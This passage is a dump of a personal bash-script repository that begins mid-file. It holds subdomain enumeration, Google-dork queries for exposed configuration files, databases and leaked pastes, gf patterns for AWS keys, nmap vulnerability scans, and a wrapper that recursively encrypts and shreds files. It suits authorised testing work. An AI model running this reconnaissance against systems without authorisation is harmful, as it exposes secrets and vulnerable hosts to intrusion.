$(wc -l tmp-findomain-$domain 2>/dev/null | awk '{print $1}')" 122 | } 123 | } 124 | 125 | Subfinder() { 126 | [ "$silent" == True ] && subfinder -all -silent -d $domain 2>/dev/null | anew subenum-$domain.txt || { 127 | [[ ${PARALLEL} == True ]] || { spinner "${bold}SubFinder${end}" & 128 | PID="$!" 
129 | } 130 | subfinder -all -silent -d $domain 1> tmp-subfinder-$domain 2>/dev/null 131 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 132 | echo -e "$bold[*] SubFinder$end: $(wc -l < tmp-subfinder-$domain)" 133 | } 134 | } 135 | 136 | Amass() { 137 | # amass is with "-passive" option to make it faster, but it may cuz less results 138 | [ "$silent" == True ] && amass enum -passive -norecursive -noalts -d $domain 2>/dev/null | anew subenum-$domain.txt || { 139 | [[ ${PARALLEL} == True ]] || { spinner "${bold}Amass${end}" & 140 | PID="$!" 141 | } 142 | amass enum -passive -norecursive -noalts -d $domain 1> tmp-amass-$domain 2>/dev/null 143 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 144 | echo -e "$bold[*] Amass$end: $(wc -l < tmp-amass-$domain)" 145 | } 146 | } 147 | 148 | Assetfinder() { 149 | [ "$silent" == True ] && assetfinder --subs-only $domain | anew subenum-$domain.txt || { 150 | [[ ${PARALLEL} == True ]] || { spinner "${bold}AssetFinder${end}" & 151 | PID="$!" 
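}
    assetfinder --subs-only $domain > tmp-assetfinder-$domain
    kill ${PID} 2>/dev/null
    echo -e "$bold[*] AssetFinder$end: $(wc -l < tmp-assetfinder-$domain)"
  }
}
# ^ tail of a function that begins above this excerpt; kept exactly as found.


# Run every enumeration source for the current $domain: concurrently through
# GNU parallel when -p/--parallel was given, otherwise one after another.
# Written as if/else on purpose: with `cond && { A; } || { B; }` the sequential
# branch B also runs whenever the last command of A returns non-zero.
_run_all_sources() {
  local fn
  if [[ ${PARALLEL} == True ]]; then
    spinner "Reconnaissance" &
    PID="$!"
    export -f wayback crt bufferover Findomain Subfinder Amass Assetfinder spinner
    export domain silent bold end
    parallel ::: wayback crt bufferover Findomain Subfinder Amass Assetfinder
    kill "${PID}"
  else
    for fn in "${list[@]}"; do
      "$fn"
    done
  fi
}


# Abort through Usage unless every space-separated name in $1 is one of the
# functions in ${list[@]}. USE and EXCLUDE later execute these names as
# commands, so this allow-list check is what keeps -u/-e from running
# arbitrary commands.
_require_known() {
  local name
  for name in $1; do
    if [[ " ${list[*]} " != *" ${name} "* ]]; then
      echo -e "${red}${Underlined}[-] Unknown Function: ${name}${end}"
      Usage
    fi
  done
}


# Run only the sources named with -u/--use ($lu), then write the results.
USE() {
  local fn
  for fn in $lu; do
    "$fn"
  done
  OUT
}


# Run every source except those named with -e/--exclude ($le), then write
# the results.
EXCLUDE() {
  local fn
  for fn in "${list[@]}"; do
    if [[ " ${le} " == *" ${fn} "* ]]; then
      continue
    fi
    "$fn"
  done
  OUT
}


# Merge the per-source temp files into the final list.
# Arguments: $1 - output file (optional; defaults to "<domain>-<date>.txt")
# Does nothing in silent mode and always returns 0, so callers cannot mistake
# a skipped clean-up step for a failure.
# NOTE(review): tmp-* is matched in the current directory, so unrelated files
# with that prefix are merged and, unless -k is given, deleted. A private
# mktemp -d directory would avoid that.
OUT() {
  [ "$silent" == False ] || return 0
  if [ -n "$1" ]; then
    out="$1"
  else
    out="$domain-$(date +'%Y-%m-%d').txt"
  fi
  sort -u tmp-* > "$out"
  echo -e "${green}[+] The Final Results:${end} $(wc -l "$out")"
  if [ "$resolve" == True ]; then
    ALIVE "$out" "$domain"
  fi
  if [ "$delete" == True ]; then
    rm -- tmp-*
  fi
  return 0
}


# Probe the hosts in file $1 with httprobe and store the live ones in
# "resolved-$2.txt".
ALIVE() {
  [ "$silent" == False ] && printf "$bold[+] Resolving $end"
  printf " \r"
  httprobe -c "$thread" < "$1" > "resolved-$2.txt"
  [ "$silent" == False ] && echo -e "${green}[+] Resolved:${end} $(wc -l < "resolved-$2.txt")"
  return 0
}


# Process every domain listed in the $hosts file according to $prv:
# a = all sources, e = all but the excluded ones, u = only the selected ones.
LIST() {
  lines=$(wc -l < "$hosts")
  count=1
  while read -r domain; do
    # A blank line would otherwise start every tool with an empty target.
    if [ -z "$domain" ]; then
      count=$((count + 1))
      continue
    fi
    [ "$silent" == False ] && echo -e "\n${Underlined}${bold}${green}[+] Domain ($count/$lines):${end} ${domain}"
    case $prv in
      a)
        _run_all_sources
        OUT
        ;;
      e) EXCLUDE ;;
      u) USE ;;
    esac
    count=$((count + 1))
  done < "$hosts"
}


# Entry point: validate the option combination, then handle -d and/or -l.
Main() {
  if [ "$domain" == False ] && [ "$hosts" == False ]; then
    echo -e "${red}[-] Argument -d/--domain OR -l/--list is Required!${end}"
    Usage
  fi
  if [ "$use" != False ] && [ "$exclude" != False ]; then
    echo -e "${Underlined}${red}[!] You can use only one Option: -e/--exclude OR -u/--use${end}"
    Usage
  fi

  if [ "$domain" != False ]; then
    if [ "$use" == False ] && [ "$exclude" == False ]; then
      _run_all_sources
      # The original `[ .. ] && OUT || OUT $out` called OUT a second time with
      # the literal "False" whenever the first call returned non-zero.
      if [ "$out" == False ]; then
        OUT
      else
        OUT "$out"
      fi
    else
      [ "$use" != False ] && USE
      [ "$exclude" != False ] && EXCLUDE
    fi
  fi

  if [ "$hosts" != False ]; then
    [ "$use" != False ] && prv=u
    [ "$exclude" != False ] && prv=e
    [ "$use" == False ] && [ "$exclude" == False ] && prv=a
    LIST
  fi
  return 0
}


# Defaults; "False" is the script's marker for "option not given".
domain=False
hosts=False
use=False
exclude=False
silent=False
delete=True
out=False
resolve=False
thread=40
PARALLEL=False

# The enumeration functions that -u/-e may name, in execution order.
list=(
  wayback
  crt
  bufferover
  Findomain
  Subfinder
  Amass
  Assetfinder
)

while [ -n "$1" ]; do
  case $1 in
    -d | --domain)
      domain=$2
      shift
      ;;
    -l | --list)
      hosts=$2
      shift
      ;;
    -u | --use)
      use=$2
      lu=${use//,/ }
      _require_known "$lu"
      shift
      ;;
    -e | --exclude)
      exclude=$2
      le=${exclude//,/ }
      _require_known "$le"
      shift
      ;;
    -o | --output)
      out=$2
      shift
      ;;
    -s | --silent)
      silent=True
      ;;
    -k | --keep)
      delete=False
      ;;
    -r | --resolve)
      resolve=True
      ;;
    -t | --thread)
      thread=$2
      shift
      ;;
    -h | --help)
      Usage
      ;;
    -p | --parallel)
      PARALLEL=True
      ;;
    -v | --version)
      echo "Version: $VERSION"
      exit 0
      ;;
    *)
      echo "[-] Unknown Option: $1"
      Usage
      ;;
  esac
  shift
done

[ "$silent" == False ] && echo -e $blue$bold"""
____ _ _____
/ ___| _ _| |__ | ____|_ __ _ _ _ __ ___
\___ \| | | | '_ \| _| | '_ \| | | | '_ \` _ \\
___) | |_| | |_) | |___| | | | |_| | | | | | |
|____/ \__,_|_.__/|_____|_| |_|\__,_|_| |_| |_|
Subdomains Enumeration Tool
By: bing0o @hack1lab
"""$end

Main
--------------------------------------------------------------------------------
/downlocal.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Download files from [Index Of] web pages
#

Usage="[+] Usage:\n \
\tdownlocal \n
"

if [ -z "$1" ] || [ "$1" = "-h" ]; then
  echo -e $Usage
  exit 1 #{ echo "[-] Don't Forget The Argument"; echo "./donwlocal.sh "; exit 1; }
fi

printf -v begin '%(%s)T' -1


# Download every non-directory link found on the index page at $1.
# The href values come from the remote server, so they are handled as data
# only: each one is passed to wget as a single quoted argument. The earlier
# `xargs -I% bash -c "wget $1/% -q"` form pasted them into a shell command
# line, where a ';', '$(...)' or backtick inside a link (even the ordinary
# "?C=N;O=D" sort links of an Apache index) was executed by bash.
down() {
  local base=$1 name
  echo "[+] Download From: " "$base"
  curl -s "$base" | grep href | awk -F'"' '{print $2}' | grep -v "/$" |
    while IFS= read -r name; do
      wget -q "$base/$name"
    done
}

# Sub-directory links; collected for the (commented-out) recursive mode below.
flist=()
res=$(curl -s "$1" | grep href | awk -F'"' '{print $2}' | grep "/$")

for i in $res; do
  flist+=("$i")
done

down "$1"

#echo "$PWD"


#[ ${#flist[@]} -ne 0 ] && { for dir in "${flist[@]}"; do cd "$PWD"; mkdir "$dir"; cd "$dir"; down "$1/$dir"; done }

#echo "${listdir[@]}"

printf -v end '%(%s)T' -1
time=$((end - begin))

min=$((time / 60))
sec=$((time % 60))

printf "\n#####################\n"
printf '[+] Time: %s:%s\n' "$min" "$sec"
printf "[+] Done!\n"
printf "#####################\n"
--------------------------------------------------------------------------------
/elastic.sh:
--------------------------------------------------------------------------------
#!/bin/bash

[ -z "$2" ] && { printf "eslatic.sh \n"; exit; }

url=$1
index=$2

# -k turns off TLS certificate verification, so the response is not
# authenticated; use it only against hosts you are authorised to query.
curl -sk "$url/$index/_search?size=10000" | jq "."
--------------------------------------------------------------------------------
/encall.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#cito M:755 O:0 G:0 T:/usr/local/bin/crypto
#----------------------------------------------------------------------------------
# A Bourne POSIX shell script acting as a wrapper for another written in Python, -
# called 'crypto.py', available with the following:
#
# wget https://raw.githubusercontent.com/bing0o/Python-Scripts/master/crypto.py
# chmod 755 crypto.py; chown 0:0 crypto.py
# sudo mv crypto.py /usr/local/bin/crypto
#
# If you have Cito (https://github.com/terminalforlife/Extra):
#
# sudo cito -r bing0o Python-Scripts master crypto.py
#
# WARNING: Change the default password!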
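#----------------------------------------------------------------------------------
#set -x
#CurVer='2019-12-13'
CurVer='2020-03-21'
Progrm=${0##*/}

# Print an error on stderr and, when the status is greater than 0, exit.
# Arguments: $1 - exit status (0 = report only), $2 - message
Err() {
  printf "ERROR: %s\n" "$2" 1>&2
  if [ "$1" -gt 0 ]; then
    exit "$1"
  fi
}

Domain='https://github.com'

# Print the help text; %b expands the leading "\r" of every here-doc line.
Usage() {
  while read -r CurLine; do
    printf "%b\n" "$CurLine"
  done <<-EOF
\r ENCALL ($CurVer)
\r Originally written by bing0o
\r Revised by terminalforlife

\r A simple Bourne POSIX wrapper for Python script Crypto.

\rSYNTAX: $Progrm [OPTS] [FILE_1 [FILE_2] ...]

\rOPTS: --help|-h|-? - Displays this help information.
\r --version|-v - Output only the version datestamp.
\r --encrypt|-e - Encrypts one or more files.
\r --decrypt|-d - Decrypts one or more files.
\r --password|-p STR - Where STR is the password to use.
\r --depth|-t INT - Where INT is the Number of depth(Default:1).

\rSITE: $Domain/bing0o/bash_scripting
\r $Domain/bing0o/Python-Scripts
EOF
}

# Built-in default password. It is published together with the script, so
# files encrypted without --password are protected by a publicly known value;
# always pass your own password (see the WARNING in the header).
Password='P4ssw@rD'

if [ $# -eq 0 ]; then
  Usage
  exit 1
fi

num=1

while [ "$1" ]; do
  case $1 in
    --encrypt | -e)
      Action='-e'
      Actioning='Encrypting'
      ;;
    --decrypt | -d)
      Action='-d'
      Actioning='Decrypting'
      ;;
    --password | -p)
      shift
      if [ -z "$1" ]; then
        Err 1 "Password mising for the '--password|-p' option."
      else
        Password=$1
      fi
      ;;
    -t | --depth)
      num=$2
      shift
      ;;
    --help | -h | -\?)
      Usage
      exit 0
      ;;
    --version | -v)
      printf "%s\n" "$CurVer"
      exit 0
      ;;
    *)
      Usage
      exit 1
      ;;
  esac
  shift
done

# The depth decides how many directory levels are collected for encryption
# and shredding, so refuse anything that is not a plain number.
case $num in
  '' | *[!0-9]*)
    Err 1 "Depth for the '--depth|-t' option must be a positive integer."
    ;;
esac

if ! command -v crypto 1> /dev/null 2>&1; then
  Err 1 "Dependency 'crypto' not met."
fi

list=()
path="."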
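
# Without --encrypt or --decrypt the selection below would match every file
# and the loop after it would still shred each one, so stop here.
case $Action in
  -e | -d) ;;
  *) Err 1 "Either '--encrypt|-e' or '--decrypt|-d' is required." ;;
esac

# Collect regular files level by level: ./*, ./*/*, ... down to $num levels.
# When encrypting, files already ending in .hacklab are skipped; when
# decrypting, only .hacklab files are taken.
for ((depth = 1; depth <= num; depth++)); do
  path=$path"/*"
  for entry in $path; do
    if [ "$Action" = '-e' ]; then
      [ "${entry##*.}" = 'hacklab' ] && continue
    elif [ "$Action" = '-d' ]; then
      [ "${entry##*.}" = 'hacklab' ] || continue
    fi
    [ -f "$entry" ] && list+=("$entry")
  done
done

c=1
all=${#list[@]}
for CurFile in "${list[@]}"; do
  printf "[+] %s: %s\n" "$Actioning ($c/$all)" "$CurFile"
  # NOTE(review): the password is passed on the command line, where other
  # local users can read it from the process list while crypto runs.
  # Shred the input only after crypto reports success; otherwise a failed run
  # would destroy the only copy. Assumes crypto exits non-zero on failure -
  # confirm against crypto.py.
  if crypto "$Action" "$CurFile" -p "$Password" 1>/dev/null; then
    # make the deleted file unrecoverable using shred.
    shred -n 10 -z --remove "${CurFile}"
  else
    printf "ERROR: %s\n" "crypto failed for '$CurFile'; the file was left in place." 1>&2
  fi
  c=$((c + 1))
done

printf "[*] Done!\n"
--------------------------------------------------------------------------------
/enumnom.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# enumnom.sh, Bash script to automate the Recon Process using tomnomnom's tools
# the installation

# NOTE(review): lines 6-21 of enumnom.sh are missing from this listing; only
# the fragment on the next line survived and it is kept exactly as found.
< domains
results=$(wc -l domains)
echo "[=+] Results: " $results

echo -e "\n[+] Start HTTPRobe."
httprobe < domains > hosts
results=$(wc -l hosts)
echo "[=+] Results: " $results

echo -e "\n[+] Start Meg."
meg -d 1000 -v /

echo -e "\n[!] Changing The Directory To ./out"
# Stop if meg produced no ./out directory; the searches that follow would
# otherwise run against whatever the current directory happens to be.
cd out || exit 1


# changed the name of `gf` to `gff` since I already have a linux tool called gf!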
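# Run each gf pattern (installed here as `gff`) over the meg output.
# meg-headers, strings and urls were commented out in the original and are
# still skipped.
for pattern in \
  aws-keys base64 cors debug-pages firebase fw go-functions http-auth ip \
  json-sec php-curl php-errors php-serialized php-sinks php-sources \
  s3-buckets sec servers takeovers upload-fields; do
  echo -e "\n[*] The OutPut For $pattern"
  gff "$pattern"
done

echo -e "\n[0] Done!"
--------------------------------------------------------------------------------
/file-share.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# The original had no ';' between printf and exit, so "exit 1" was printed as
# text and the upload went ahead with an empty file name.
[ -z "$1" ] && { printf "[!] file-share \n"; exit 1; }

# Uploads the file to the third-party service file.io and prints the download
# link; anyone who obtains that link can fetch the file.
curl -F "file=@$1" https://file.io -s | sed 's/,/\n/g' | awk '/link/{gsub(/"/," ",$0); print $NF}'
--------------------------------------------------------------------------------
/google-hacking.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Tool Used: https://github.com/dwisiswant0/go-dork
#
#[ -z "$1" ] && { printf "[!] google-hacking \n"; exit; }
#
#
# ./google-hacking.sh target.com
# $ cat targets.txt | ./google-hacking.sh
#

# Print a heading, run one go-dork query and save its output.
# Arguments: $1 - heading, $2 - search query, $3 - file to write
_dork() {
  printf '%s:\n' "$1"
  go-dork -q "$2" -s -nc -p 5 | tee "$3"
}

# Run the whole query set for one site and store each result under
# "$ROOT/<site>/".
# Arguments: $1 - site (host name)
DORKS() {
  local site=$1
  # The site becomes a directory name and may arrive on stdin, so refuse
  # values that would leave $ROOT or look like an option.
  case $site in
    '' | */* | .* | -*)
      printf '[-] Skipping invalid site: %s\n' "$site" >&2
      return 1
      ;;
  esac

  dir="$ROOT/$site"
  mkdir -p "$dir"

  _dork "Publicly exposed documents" \
    "site:$site ext:doc | ext:docx | ext:odt | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv" \
    "$dir/documents"

  #Directory listing vulnerabilities
  _dork "Directory listing" "site:$site intitle:index.of /" "$dir/dir-listing"

  _dork "Configuration files exposed" \
    "site:$site ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini | ext:env" \
    "$dir/config-files"

  _dork "Database files exposed" "site:$site ext:sql | ext:dbf | ext:mdb" "$dir/Databases"

  _dork "Log files exposed" "site:$site ext:log | ext:logs" "$dir/log-files"

  _dork "Backup and old files" \
    "site:$site ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup" \
    "$dir/backups"

  _dork "Login pages" \
    "site:$site inurl:login | inurl:signin | intitle:Login | intitle:\"sign in\" | inurl:auth" \
    "$dir/login-pages"

  _dork "SQL errors" \
    "site:$site intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\" | intext:\"unexpected end of SQL command\" | intext:\"Warning: mysql_connect()\" | intext:\"Warning: mysql_query()\" | intext:\"Warning: pg_connect()\"" \
    "$dir/sqlErrors"

  _dork "PHP errors / warnings" \
    "site:$site \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"" \
    "$dir/php-errors"

  # The remaining queries were single-quoted in the original, so the literal
  # text "$1" was searched instead of the site; they now expand the site.
  _dork "phpinfo()" \
    "site:$site ext:php intitle:phpinfo \"published by the PHP Group\"" \
    "$dir/phpinfo"

  _dork "Search Pastebin.com / pasting sites" \
    "site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org | site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app | site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org | site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io | site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org | site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net | site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io | site:trello.com \"$site\"" \
    "$dir/pastebin"

  _dork "Search Github.com and Gitlab.com" \
    "site:github.com | site:gitlab.com \"$site\"" \
    "$dir/Gits"

  _dork "Search Stackoverflow.com" "site:stackoverflow.com \"$site\"" "$dir/stackoverflow"

  _dork "Signup pages" \
    "site:$site inurl:signup | inurl:register | intitle:Signup" \
    "$dir/signups"

  _dork "papaly bookmarks" "site:papaly.com \"$site\"" "$dir/papaly"

  #go-dork -q 'site:$1 ' -s -nc -p 5
}

ROOT="google-hacking"
mkdir -p "$ROOT"

# One site as the argument, or one site per line on stdin.
if [ -z "$1" ]; then
  while read -r site; do
    DORKS "$site"
  done
else
  DORKS "$1"
fi
--------------------------------------------------------------------------------
/lf.sh:
--------------------------------------------------------------------------------
#!/bin/sh
#
# just a Bourne POSIX shell script to list directories or files in the given path
#

# Print the help text; %b expands the leading "\r" of every here-doc line.
Usage () {
  while read -r CurLine; do
    printf '%b\n' "$CurLine"
  done <<-EOF
\r#Usage:
\r lf
\r d For Directories
\r f For Files
\r L For Symbolic Links
\r p For Named Pipes
\r S For Sockets
\r b For Block Special Files
EOF
}

# $1 must be a single letter that `test` accepts as a file-type operator.
case $1 in
  [fdLpSb]) Type=$1 ;;
  *) Usage; exit 1 ;;
esac

# Hidden and visible entries of the given directory (default: current one).
for CurFile in "${2:-.}"/.* "${2:-.}"/*; do
  case $CurFile in
    .|..|*/.|*/..) continue ;;
  esac

  [ "-$Type" "$CurFile" ] && printf '%s\n' "${CurFile#./}"
done
--------------------------------------------------------------------------------
/monitor.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Use only the aggregate "cpu" line. The original /^cpu/ also matched the
# per-core lines, so the value reported was that of the last core.
# The counters in /proc/stat run since boot, so this is an average since boot.
cpu=$(awk '$1 == "cpu" {usage=($2+$4)*100/($2+$4+$5)} END{printf("%d\n", usage)}' /proc/stat)
[ "$cpu" -ge 80 ] && notify-send -u critical "High CPU usage: ${cpu}%"

free -m | while read -r Type Total Used Free _; do
  if [ "$Type" = 'Mem:' ]; then
    PCent=$((Used*100/Total))

    [ "$PCent" -ge 80 ] && notify-send -u critical "High RAM usage: ${PCent}%"
  fi
done

# Bourne POSIX-compliant approach.
df -P / | while read -r F1 _ _ _ F5 _; do
  if ! [ "$F1" = 'Filesystem' ]; then
    PCent=${F5%\%}

    [ "$PCent" -ge 80 ] && notify-send -u critical "High DISK usage: ${PCent}%"

    # In-case there are for some reason >1 matches.
    break
  fi
done

# In-case we're running in a cron job.
exit 0
--------------------------------------------------------------------------------
/music.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# bash script to pick a music for you from the given directory.
# Just For Fun [^^]
#
# chmod 755 music.sh
# sudo cp music.sh /usr/local/bin/music
#

#set -x

cyan="\e[36m"
end="\e[0m"

# Play entry $num of the global array `music`, after stopping any running
# vlc; $vlc selects the GUI player (True) or cvlc (anything else).
MUSIC () {
  pick=${music[$num]}

  echo -e "${cyan}\n[+] The Songs: ${end}" "${#music[@]}"
  echo -e "${cyan}[+] The Picked Number: ${end}" "$num"
  echo -e "${cyan}[+] The Picked Song: ${end}" "${pick##*/}"

  pkill vlc

  case $vlc in
    True) vlc "$pick" &>/dev/null & ;;
    *) cvlc "$pick" --play-and-exit &>/dev/null & ;;
  esac
}

prog=${0##*/}

# Print the help text; %b expands the "\r" and "\t" escapes of each line.
Usage() {
  while read -r line; do
    printf "%b\n" "$line"
  done <<-EOF

\r #Options:
\r \t -p, --path\t\t The Path To Your Music Directory.
\r \t -e, --extension\t The Extension of The Files (mp3, mp4, avi,....etc, or "*" to load all the files).
\r \t -v, --vlc\t\t to run the music or the video clip with vlc GUI.
\r \t -l, --list\t\t to list all the songs and pick the music by yourself.
\r #Example:
\r \t $prog -p $HOME/Music -e mp3 -v -l

EOF
}

# change the default path here!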
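path="$HOME/Music"
ext="mp3"
vlc=False
list=False

while [ -n "$1" ]; do
  case "$1" in
    -p | --path)
      path=$2
      shift
      ;;
    -e | --extension)
      ext=$2
      shift
      ;;
    -v | --vlc)
      vlc=True
      ;;
    -l | --list)
      list=True
      ;;
    *)
      Usage
      exit 1
      ;;
  esac
  shift
done


# Build the playlist. A quoted "$ext" is matched literally, so the documented
# -e "*" needs its own pattern.
if [ "$ext" = '*' ]; then
  candidates=("$path"/*.*)
else
  candidates=("$path"/*."$ext")
fi

music=()
m=0
for i in "${candidates[@]}"; do
  # Count regular files only; an unmatched pattern stays as literal text.
  [ -f "$i" ] || continue
  music[m]=$i
  [ "$list" == True ] && echo "[$m] ${i##*/}"
  m=$((m + 1))
done

if ((m == 0)); then
  echo "[-] No matching files in: $path" >&2
  exit 1
fi

if [ "$list" == True ]; then
  read -r -p "[+] Pick a Song: " num
  # The answer is used as an array index, which bash evaluates as arithmetic;
  # accept plain digits within range only.
  case $num in
    '' | *[!0-9]*)
      echo "[-] Not a valid number: $num" >&2
      exit 1
      ;;
  esac
  num=$((10#$num))
  if ((num >= m)); then
    echo "[-] Pick a number between 0 and $((m - 1))" >&2
    exit 1
  fi
else
  num=$((RANDOM % m))
fi

MUSIC
--------------------------------------------------------------------------------
/mynmap.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Simple bash script to run nmap against a list of hosts or IPs
#


PRG=${0##*/}
VERSION="2020-05-25"

# Print the help text; %b expands the "\r" and "\t" escapes of each line.
Usage() {
  while read -r line; do
    printf "%b\n" "$line"
  done <<-EOF
\r$PRG:\t\t - run nmap against a list of hosts or IPs.
\r
\rOptions:
\r -l, --list - List of Domains or IPs.
\r -o, --output - The output Directory to save the results.
\r -p, --ports - List of Ports (Default:20 ports).
\r (7001,9200,6443,2379,10250,10255,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,81,8443,8834,8888)
\r -h, --help - Displays this Informations and Exit.
\r -v, --version - Displays The Version
\rExample:
\r $PRG -l domains.txt -t 20 -o status.txt
\r

EOF
}


list=False
out=nmap-results
ports="7001,9200,6443,2379,10250,10255,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,81,8443,8834,8888"

while [ -n "$1" ]; do
  case $1 in
    -l | --list)
      [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; }
      list=$2
      shift
      ;;
    -o | --output)
      [ -z "$2" ] && { printf "[-] -o/--output needs a Directory to write the results to.\n"; exit 1; }
      out=$2
      shift
      ;;
    -p | --ports)
      [ -z "$2" ] && { printf "[-] -p/--ports, ports e.g(80,443,8080,8443)\n"; exit 1; }
      ports=$2
      shift
      ;;
    -h | --help)
      Usage
      exit
      ;;
    -v | --version)
      printf '%s\n' "$VERSION"
      exit
      ;;
    *)
      # Print the argument as data, never as part of the printf format.
      printf '[-] Error: Unknown Options: %s\n' "$1"
      Usage
      exit 1
      ;;
  esac
  shift
done


# Scan every host in the list file, one nmap run per host, writing each
# report to "$out/<host>".
Main() {
  local host report
  all=$(wc -l < "$list")
  count=1
  while read -r host; do
    printf '[%s/%s]' "$count" "$all"
    printf " \r"
    count=$((count + 1))
    # Each line becomes an nmap argument and a file name: skip blank lines
    # and anything starting with '-', which nmap would read as an option.
    case $host in
      '' | -*) continue ;;
    esac
    # A '/' (for example CIDR notation) may not appear in the report name.
    report=${host//\//_}
    nmap "$host" -Pn -p "$ports" -oN "$out/$report" -T4 &>/dev/null
  done < "$list"
}


if [ "$list" == False ]; then
  printf "[!] Argument -l/--list is Required!\n"
  Usage
  exit 1
else
  [ -d "$out" ] || mkdir -p "$out"
  Main
fi
--------------------------------------------------------------------------------
/mywhois.sh:
--------------------------------------------------------------------------------
#!/bin/bash

[ -z "$1" ] && { printf "[!] Usage: whois \n"; exit 1; }

# API_KEY is a placeholder for your own key. The key travels in the URL, so
# certificate verification stays on (the original -k is dropped); with -k an
# on-path attacker could read the key.
# NOTE(review): "gnoreRawTexts" looks like a misspelt "ignoreRawTexts" -
# confirm against the API documentation.
curl -s "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=API_KEY&gnoreRawTexts=1&outputFormat=json&domainName=$1" | gron | grep -v "rawText\|strippedText" | grep "registrant" | grep "name\|email\|organization"
--------------------------------------------------------------------------------
/naabu-to-nmap.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# use naabu for full port scan then go deeper with each port using nmap
# https://github.com/projectdiscovery/naabu
#
[ -z "$1" ] && { printf "[!] Usage: ./naabu-to-nmap.sh \n"; exit; }

[ -d "nmap-results" ] || mkdir "nmap-results"


E8080=False # Exclude port 8080 from the scan
E8443=False # Exclude port 8443 from the scan

C8080=$(grep -c ':8080$' "$1") # Count Port 8080
C8443=$(grep -c ':8443$' "$1") # Count Port 8443

Exclude=()

# A port that is open on 20 or more hosts is left out of the nmap stage.
[[ ${C8080} -ge 20 ]] && Exclude+=("8080") #E8080=True
[[ ${C8443} -ge 20 ]] && Exclude+=("8443") #E8443=True

# Unique hosts from the "host:port" lines of the naabu output.
mapfile -t all < <(cut -d ':' -f 1 "$1" | sort -u)

length=${#all[@]}

count=1
for IP in "${all[@]}"; do
  printf '[+] [%s/%s] Scanning: %s ' "$count" "$length" "$IP"
  printf " \r"
  count=$((count + 1))

  # The host is used as an nmap argument and as a file name.
  case $IP in
    '' | -* | */*) continue ;;
  esac

  # Ports of exactly this host, minus the excluded ones, comma separated.
  # The original matched hosts by prefix (10.0.0.1 also selected 10.0.0.10)
  # and removed excluded ports as substrings (8080 inside 18080).
  ports=$(awk -F: -v ip="$IP" -v skip="${Exclude[*]}" '
    BEGIN { n = split(skip, s, " "); for (i = 1; i <= n; i++) drop[s[i]] = 1 }
    $1 == ip && !($2 in drop) && !seen[$2]++ { out = out (out == "" ? "" : ",") $2 }
    END { print out }' "$1")

  # Nothing left to scan for this host.
  [ -n "$ports" ] || continue

  nmap --script default,vuln -sV -T4 "$IP" -p "$ports" -oN "nmap-results/$IP" --open -Pn &>/dev/null # Run nmap scan with the (default and vuln) scripts.
done
--------------------------------------------------------------------------------
/netspace.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# shell script to create a linux network namespace with internet access
#

PRG=${0##*/}

# Print the help text; %b expands the leading "\r" of every here-doc line.
Usage() {
  while read -r line; do
    printf "%b\n" "$line"
  done <<-EOF
\r#Options:
\r -n, --name - Name For New Namespace.
\r -v, --veth - Veth name.
\r -p, --peer - Peer name.
\r -i, --interface - Network Interface (Default: eth0).
\r --vip - IP For Veth.
\r --pip - IP For Peer.
\r -h, --help - Shows The Help Message.
\r#Example:
\r $PRG --name vpn --veth veth0 --peer peer0 --interface eth0 --vip 10.0.1.1 --pip 10.0.1.2
EOF
}

ns="vpn"
VETH="veth-0"
PEER="peer-0"
VIP="10.0.1.1"
PIP="10.0.1.2"
IFACE="eth0"

while [ -n "$1" ]; do
  case $1 in
    -n | --name)
      ns="$2"
      shift
      ;;
    -v | --veth)
      VETH="$2"
      shift
      ;;
    -p | --peer)
      PEER="$2"
      shift
      ;;
    --vip)
      VIP="$2"
      shift
      ;;
    --pip)
      PIP="$2"
      shift
      ;;
    -i | --interface)
      IFACE="$2"
      shift
      ;;
    -h | --help)
      Usage
      exit
      ;;
    *)
      echo "[-] Unknown Option: $1"
      Usage
      exit 1
      ;;
  esac
  shift
done


# creating new network namespace
ip netns add "${ns}"

# setting loopback interface up
ip netns exec "${ns}" ip link set lo up

# Creating a veth pair
ip link add "${VETH}" type veth peer name "${PEER}"

# moving the peer end to our new namespace
ip link set "${PEER}" netns "${ns}"

# Assigning IPs to our veth devices
ip addr add "${VIP}/24" dev "${VETH}"
ip netns exec "${ns}" ip addr add "${PIP}/24" dev "${PEER}"

# bring them up
ip link set "${VETH}" up
ip netns exec "${ns}" ip link set "${PEER}" up
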
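# checking if IPv4 Forwarding is enabled and enabling it if it's not.
# This turns the host into a router for all interfaces and is not reverted.
[ "$(cat /proc/sys/net/ipv4/ip_forward)" = 1 ] || echo 1 > /proc/sys/net/ipv4/ip_forward

# Packet forwarding with iptables
# NOTE(review): rules are appended on every run and never removed, so
# repeated runs leave duplicate ACCEPT/MASQUERADE entries behind.
iptables -A FORWARD -o "${IFACE}" -i "${VETH}" -j ACCEPT
iptables -A FORWARD -o "${VETH}" -i "${IFACE}" -j ACCEPT

# IP Masquerading
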